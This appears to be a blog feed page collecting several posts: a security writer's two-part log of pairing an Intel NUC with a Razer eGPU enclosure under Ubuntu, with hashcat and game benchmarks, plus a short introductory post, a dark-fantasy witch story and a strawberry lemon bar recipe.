Apparently, this is a common problem with NUC devices. Luckily, I was well within my three-year warranty, so I opened a support ticket. I had found the likely fix online – resetting the CMOS – however, I could not unscrew the screws affixing the motherboard to the chassis. The support agent suggested the same fix, but eventually I was able to RMA it. I have to say, Intel’s support team was great here.

Windows & eGPU experience

I haven’t yet upgraded my laptop or any other Windows system to something with Thunderbolt 3, so this is planned for the future.

Day to day experience

So far, the games have worked okay. That is to say that performance on an older NUC with a lower-end CPU (its purpose was mostly to have decent memory for many low-impact #Docker containers, and sufficient high-speed storage for database seeks) has been pretty good. This is my “workhorse” system: something I expect to use for long-running, non-interactive jobs, and it seems to do them excellently. When the system

Games

Just as I started in on this project, I was also listening to the [Linux Downtime](https://linuxdowntime.com) podcast, and as luck would have it, they had an episode with Liam, the author of the Gaming on Linux website. They introduced me to Proton, a Steam project to bring mainstream games to #Linux, requiring just a right-click setting to enable on Linux what would otherwise be a Windows-only game. This opened up a realm of possibilities, and also delayed the testing as I played through – er, thoroughly tested – the capabilities of the NUC + eGPU combination.

Running games under Ubuntu with the eGPU connected seemed to work well. The window on the enclosure is nice, as you can see when the system offloads to the GPU.

Intel NUC with Razer Core X Chroma

Deployment

Before and After

GTX 1060 and RTX 3090

Considerations

With the newest GPUs, space is a consideration. Some of the most powerful cards are three PCIe slots wide, and the Chroma enclosure only handles two slots (officially). That was one of the drivers for a 3090, though I have seen people doing a bit of machining in order to fit a three-slot card into the rather large enclosure.

Benchmarking

I didn’t take down

Hashcat

Intel NUC i5 + GTX 1060:
– example0: 733.3 MH/s, 55s
– example400: 2741.0 kH/s
– example500: 63348 H/s

Intel NUC i5 + RTX 3090:
– example0: 10460.7 MH/s
– example400: 10491.0 kH/s
– example500: 73839 H/s
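For context, a quick bit of arithmetic on the figures above shows how uneven the upgrade is across hash modes (units match within each row, so the ratios are unitless):

```python
# Speedup of the RTX 3090 over the GTX 1060, from the hashcat runs above.
results = {
    "example0":   (733.3,   10460.7),  # MH/s
    "example400": (2741.0,  10491.0),  # kH/s
    "example500": (63348.0, 73839.0),  # H/s
}
for mode, (gtx_1060, rtx_3090) in results.items():
    print(f"{mode}: {rtx_3090 / gtx_1060:.1f}x")
# → example0: 14.3x, example400: 3.8x, example500: 1.2x
```

The raw-throughput mode gets the full benefit of the bigger card, while the smaller gains on example400 and example500 suggest those runs were bottlenecked somewhere other than raw GPU compute (short runs, the host CPU, or the hash mode itself).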

Portal 2

Portal 2 runs natively under Linux, so this was an easy test.

Intel NUC i5 – no GPU:
– choppy
– barely playable

Intel NUC i5 + GTX 1060:
– smooth
– playable

Guardians of the Galaxy game

Intel NUC i5 – no GPU:
– choppy
– barely playable

Intel NUC i5 + GTX 1060:
– lower framerate while big action is taking place
– mostly playable

Intel NUC i5 + RTX 3090:
– smooth, and with higher settings than the GTX 1060
– playable, but CPU runs between 65–85% during gameplay, so an upgrade here would help

Before and After

One of the primary objectives was to lower both the size and power footprint while upgrading the overall capacity and computing experience. As the next couple of pictures show, the first objective was achieved. The second objective remains a bit more elusive. When the system works, it works, but I am still trying to figure out what causes me to land in a reboot cycle where I need to power on and then reboot 2-3 times before the OS fully recognizes the GPU and peripherals connected to the USB hub.

Image: Full tower on top of network stack – a plain black tower PC with red glowing fans in front.

And here comes the i7 NUC on top of the eGPU enclosure. NUCs are a study in economy of space, but the following picture really showcases how a full-fledged, highly-performant computer is still about 1/30 the size of the one it replaced (ignoring the GPU, of course).

Intel NUC on top of Razer Core X Chroma eGPU Image: Just the enclosure with a NUC on top.

The picture above shows the move to the enclosure with the NUC as primary compute. Weird that the camera picks up so much debris on top of the enclosure; it’s actually very new and there is very little dust on it.

Thoughts

While the vertical space savings are significant, I’d say that if space economy is your primary objective, the eGPU only aids in vertical space savings; the enclosure has about the same 2D footprint as my former tower. But, if you count the space (& weight!!) savings in the laptop, it becomes significant. I can comfortably travel with a light, sub-3 lb. (<1.5 kg) laptop in my backpack for hours on end. This is important for conferences like DEFCON or FIRST where you are going to be away from the hotel pretty much all day and want the laptop with you, even though it will be unused in the backpack for much of the time.

After this fairly expensive experiment (which I’m stuck with for a few years), I’m not sure if I’d do it again. There are definitely benefits as I’ve outlined above, and it has mostly met my expectations. The NUC is due for an upgrade in a year, and it’s difficult for me to imagine needing much more in the way of GPU for a while[^1] so I think that will make upgrades easier to navigate. It’s much simpler to look at the small form-factor PCs available and choose from that rather than evaluating all the available parts from a myriad of vendors and navigating their (in)compatibilities.

What it really comes down to is the plug-and-playability. If I could treat this thing like a docking station with a massive GPU, I would be all-in. As it stands, the setup is more of a trial-and-error PnP system where I’m never sure what I’m going to get out of it. To that end, lack of hot plug support is unfortunate. I’d really like to be able to move the eGPU from the NUC to a laptop without needing to shutdown the system.

Since Ubuntu 22.04 and especially 23.04 worked much better than 20.04, I am hopeful for improvements in the ease-of-use.

At a minimum, I would wait for a Thunderbolt 4-capable GPU enclosure. When I started this project, all of the proven enclosures were Thunderbolt 3, manufacturers don’t release these things very often, and I was pretty impatient to give my theory a try. (Also, I’d promised an old, yet capable, system to a friend’s son. I wasn’t about to go back on that deal!). If you try something similar let me know!

[^1]: Unless I decide to go really nuts on training language models and other tasks and need to start using some of the Nvidia Tesla gear in my system.

 
Read more...

from Threatc.at

Trying stuff.

As in, both definitions?

I will attempt to post stuff here that will likely be a redundant copy of something I posted elsewhere. And also in the sense that navigating and using online spaces today is annoying and difficult, and strains one's patience. Who knows what any particular platform is going to be like in x months or years. Better to have some other space to collect that stuff.

Anyway. As Austrians say, schau ma mal (“we'll see”).

 
Read more...

from JR DePriest

aka The Clockwork Witch

I heard the man across the restaurant, excitedly telling his server about his “vision quest”.

I reached into his mind and watched the finale before he spoke it: stripped nearly naked, hooks pulling his skin on both sides of his torso, darkness, firelight, drums, and a heavy dose of ayahuasca.

He said his vision brought him here, to our little out-of-the-way hamlet, by the shallow lake, by the thick woods, between the mountains.

And I saw his vision: the surging water, the sudden collapse, the sky lit by fiery aurorae.

He had seen something he should not have seen.

I twisted his vision, brought it from the past to the present, parked it in place, amplified it with my own magick.

His head went back, eyes wide, mouth slack open and keening like a dying animal.

I turned back to my companion, the witch. She had a name, but I called her “the witch”.

“Someone call 911,” she said.

The police and paramedics gently took him away, for observation, for his own safety.

Most everyone there was part of the plan. Most everyone there knew what had really happened and breathed a sigh of relief.

Others just shook their heads, feeling sorry for a man who had some sort of nervous breakdown at a crowded restaurant.

I took the witch's hand and said we needed to talk to her father.

This man's vision was not part of our plan and what it showed was troubling, too troubling to talk about in mixed company.

She was unconcerned. She didn't see what I saw.

As we exited into the street, into the cool night, into the moist air, we talked about what we'd accomplished in three generations.

We'd made this town prosperous. We made it comfortable.

We were in brochures and discussed on message boards and social media.

“a haunted little town”

“a beautiful, if quirky, gem”

“strange tidings, lovely people”

This place was alive and we bled off the excess slowly, for our own benefit, for the benefit of everyone who called this place home.

What he had seen was like a tidal wave, like the water, once sucked out to sea, suddenly pouring back in, overwhelming everything.

I was old enough to know what this meant but I said nothing of my fears to the witch.

Fear? Was it fear?

Or was it a sense of the inevitable. Of knowing this day would come.

Was it relief?

Could the emotions of a thing like me be described in such simple terms?

The witch smiled, and intertwined our arms.

It was a cold night and I could see her breath.

The parking lot of her father's office, the only office building in town, was empty.

A witch like him didn't need to drive.

There was no warning.

The parking lot exploded in front of us as a house made of metal and wire seemed to dig its way up through molten asphalt and churning earth.

I recognized it at once; “the clockwork witch,” I said out loud.

The witch at my side did not understand.

To her “the clockwork witch” was an urban legend.

A tale to terrify young witches into behaving.

“The clockwork witch” had been the creator of this place, had filled it with potential, with purpose.

She'd created a nexus (a nadir, really), a place where all magic must flow and would feed and feed until she had the power to rule everything, everyone.

But she was betrayed and locked away by her students, by her lessers.

How had they found the words to bind her?

How had they discovered the symbols needed?

How had they devised such clever wards without help?

I knew what happened, because I was there.

Yes, of course I knew.

She was trapped outside of time, outside of space.

A pocket reality where she could play god or goddess, do whatever she wished, create, destroy, anything.

But away from here, away from us.

We steeped in the magick, siphoned a little off the top, before releasing it back into the world.

What flows here, we use simply, for our own benefit, for the benefit of the town.

We share. We cooperate. We thrive.

For generations.

Now, here she was, the clockwork witch reborn.

She could not be as strong as she once was, the power was no longer here and breaking free could not have been easy.

But some magick requires only the correct way of thinking and reality will bend all on its own.

And the witch beside me disappeared, vanished.

I believed her father had probably done the same.

Not by choice.

No, the clockwork witch had them.

She looked so human as she stood before me, an old woman in one view, a towering fiend from another angle. I saw both simultaneously.

She knew me, remembered me.

It had been hundreds of years for me, for her, who knows? An hour, a weekend, a millennium?

I was standing before her.

I did not move nor was I moved, I was simply in front of her now whereas previously I had not been.

I bowed before her. As was my position.

The position she had appointed.

“Watcher,” she said.

“Master,” said I.

“Am I?” she said.

I said nothing.

“Watcher, tell me what has happened.”

She did not mean with words but with my mind I exposed all the centuries of memories, of meetings, decisions, of births, deaths, agreements made and broken, waters risen and fallen, the shift from the forest to the edge, from hiding to inviting, to deceit and capitalism.

I showed her almost everything.

I felt her disappointment.

I was supposed to shepherd them, not become their servant.

She raised a phial of liquid to her lips and drank.

I knew these phials and felt this was the remains of the father of the witch who had been my companion.

“Mary” had been her name. I felt shame in using it now.

At one angle the clockwork witch grew taller, broader; from another, she grew younger.

She lifted another phial and spoke to it: “what is it you want?” she asked.

And Mary's voice said, “I've only ever wanted a small coven of my own.”

We both felt the truth in this. Mary had been part of the great work because it was her birthright, but her heart was never in it, not like her father.

The clockwork witch felt no anger or hatred from her.

“Then have it,” she said, tossing the phial back into the pocket dimension in which she had been trapped.

I wished Mary well.

“Watcher,” she said to me.

I felt the sting of her eyes, the depth of her gaze.

She reached into me, deeply, deeper than I'd even allow myself to venture.

“You betrayed me,” she said.

There was no emotion to her words. I could feel her words and there was no emotion.

It was only a statement of fact.

I did not remember betraying her, but I felt the truth in it.

It was me. I taught them to capture her.

Then I made myself forget.

I felt my body slip away, forget itself completely, become liquid, become smoke, slithering into the ground, but I was caught, and stoppered.

And she drank me.

I felt myself break apart, each bit struggling to remember a single fact, a single bit of information.

That was all I was, information.

That was my purpose.

And I felt each fragment lose its grip until even my own name was a mystery.

I was nothing but her blood, her life.

I was gone.


#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #AmWriting #WritingCommunity #ShortFiction #Fiction #Paranormal #Witch #Magick


This work is licensed under the Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/2.5/ or send a letter to Creative Commons, 543 Howard Street, 5th Floor, San Francisco, California, 94105, USA.

 
Read more...

from Lee Rayl's Big Ideas

– Cooking spray
– 1 cup (8 oz.) unsalted butter, softened, cut into cubes
– 1½ cups granulated sugar, divided
– ¼ tsp. kosher salt
– 2½ cups (about 10⅝ oz.) unbleached all-purpose flour, divided
– 5 large eggs, at room temperature
– 1 Tbsp. grated lemon zest plus 1 cup fresh juice (from 4 lemons)
– 3 cups thinly sliced fresh strawberries
– Powdered sugar, for serving

  1. Preheat oven to 350°. Line bottom and sides of a 13x9-inch baking pan with parchment paper, leaving a 2-inch overhang over long sides of baking pan. Coat with cooking spray; set aside.

  2. Beat butter and ½ cup of the granulated sugar in bowl of a stand mixer fitted with a paddle attachment on high speed until light and fluffy, 2 to 3 minutes, stopping to scrape down sides of bowl as needed. Whisk together salt and 2 cups of the flour in a medium bowl until combined. With mixer running on low speed, slowly add flour mixture to butter mixture, mixing until just combined, about 30 seconds, stopping to scrape down sides of bowl as needed. Increase speed to high, and beat until dough holds together, about 1 minute. Transfer dough to baking pan; press into an even layer. Bake in oven until edges are just beginning to brown, 18 to 20 minutes.

  3. Meanwhile, whisk together eggs and remaining 1 cup granulated sugar until combined. Whisk in lemon zest, lemon juice and remaining ½ cup flour until no clumps remain. Let mixture stand, uncovered, at room temperature until foam appears on top, 2 to 3 minutes; skim off and discard foam.

  4. Remove pan from oven. Pour lemon mixture evenly over hot crust; arrange strawberry slices evenly over top. Return pan to oven, and bake at 350° until filling is just set in center but still a little jiggly, 20 to 25 minutes. Let cool in pan on a wire rack, about 30 minutes. Refrigerate, uncovered, until fully chilled, about 45 minutes. Remove from pan using parchment paper overhang as handles. Cut into 12 bars, and dust with powdered sugar.

Serves: 12 · Active time: 35 minutes · Total time: 2 hours, 30 minutes

#cooking #strawberries #lemons #recipes

 
Read more...

from Kevin Neely's Security Notes

This is a log of experiences and experimentation in moving from more traditional home computing –ATX cases, components, water cooling, and continual upgrades– to something a bit more modular in terms of GPU computing power. This guide probably isn’t for most people. It’s a collection of notes I took during the process, strung together in case they might help someone else looking to pack multiple power-use-cases into as small a format as possible.

[Note:] A later evolution should involve a similar down-sizing of a home storage appliance.

Objectives

An external GPU requires more setup, and -let’s face it- fiddling than getting a gaming laptop or a full PC case that can handle multi-PCIe-slot GPUs. So why do it? A couple of objectives had been bouncing around in my head that led me to this:
– I need a system that can run compute-intensive and GPU-intensive tasks for long periods of time, e.g. machine learning and training large language models
– I need a light laptop for travel (i.e. I don’t want to carry around a 5+ lb./2.5 kilo gaming laptop)
– I want to be able to play recent games, but don’t need to be on the cutting edge of gaming
– I want to reduce the overall space footprint for my computing devices

In summary, I want my systems to be able to handle the more intensive tasks I plan to throw at them: a Windows laptop for gaming and travel, and a stay-at-home system that can perform long-running tasks such as AI model training, password cracking, and daily cron jobs.

Things I don’t care about:
– being able to play games while traveling
– documents diverging across multiple systems: I use a personal #NextCloud instance to keep my documents in sync

Current State

I have a number of personal computing devices in my home lab for testing things and running different tasks, but they’re all aging a bit, so it is time to upgrade:
– my Razer Blade 13 laptop is from 2016
– my main tower/gaming PC is from 2015, with an Nvidia GTX 1060
– an i5 NUC from 2020 (unused)
– an i3 NUC from 2013 (unused)
– a 6TB NAS with 4 aging 2TB drives from 2014
– Raspberry Pis and some other non-relevant computing devices

Configurations

With the objectives in mind, and realizing that my workload system would almost certainly run Linux, the two configurations for experimentation were:
– Intel NUC with an eGPU
– Lightweight laptop (e.g. Dell XPS 13) with an eGPU

[Note:] The computing systems must support at least Thunderbolt3, though version 4 would be best for future-proofing.

Shows an Nvidia GTX 1060 in a Razer Core X Chroma eGPU enclosure Image: Original GTX 1060 GPU slotted in the Razer Core X Chroma enclosure

Background Research

Before starting on this endeavor, I did a lot of research to see how likely I’d be able to succeed. The best source I found was the eGPU.io site, with many reviews and descriptions of how well specific configurations worked (or didn’t). They also have nice “best laptop for eGPU” and “best eGPU enclosures” matrices.

Nvidia drivers and Ubuntu

Installing Nvidia drivers under #Ubuntu is pretty straightforward these days, with a one-click install option built into the operating system itself. The user can choose between versions, and my research showed that most applications required either version 525 or 530. I installed 530.

eGPU information

The two best sources I found for information on configuring and using eGPUs were:
– r/eGPU on reddit, and their “so you’re thinking about an eGPU” guide
– egpu.io

Proof-of-concept

Having read a fair amount about the flakiness of certain #eGPU setups, I approached this project with a bit of caution. My older tower had a respectable, if aging, GTX 1060 6GB in it, and I already had a recent Core i5 Intel NUC running Ubuntu and some test machine learning applications, so all I needed to fully test this was the enclosure. Researching the various enclosure options, I chose the Razer Core X Chroma because:
– the Razer Core X series appears to have some of the best out-of-the-box compatibility
– I’ve been impressed with my aging Razer laptop, so I know they build quality components
– the Chroma version adds what is basically a USB hub in the back, with 4 USB 3.x ports and an ethernet jack, to the plain Core X

My thinking was that this system could not only provide GPU, but also act as an easy dock-hub for my primary computers. This didn’t work out quite as I planned (more in the next post).

The included thunderbolt cable is connected from the NUC to the eGPU. Theoretically, the standard peripherals (keyboard, mouse, etc.) should be connected to the eGPU hub and everything will “just work”. However, in my testing, things worked best with the peripheral hub I use plugged into the NUC and only the #Thunderbolt cable plugged into the enclosure. In the spirit of IT troubleshooters everywhere: start by making the least amount of change and iterate from there.

Intel NUC on top of Razer Core X Chroma eGPU Image: Just the enclosure with a NUC on top.

Experience

The NUC was on Ubuntu 20.04. The drivers installed just fine, but the system just wouldn’t see the GPU. Doing some research, it looked like people were having better results with more recent versions of Ubuntu, so I did a quick sudo apt dist-upgrade to bring the system to 22.XX. The GPU worked! However, the advice I’d been given was to upgrade to 23.04, so I did that, and the system still worked fine.

 
Read more...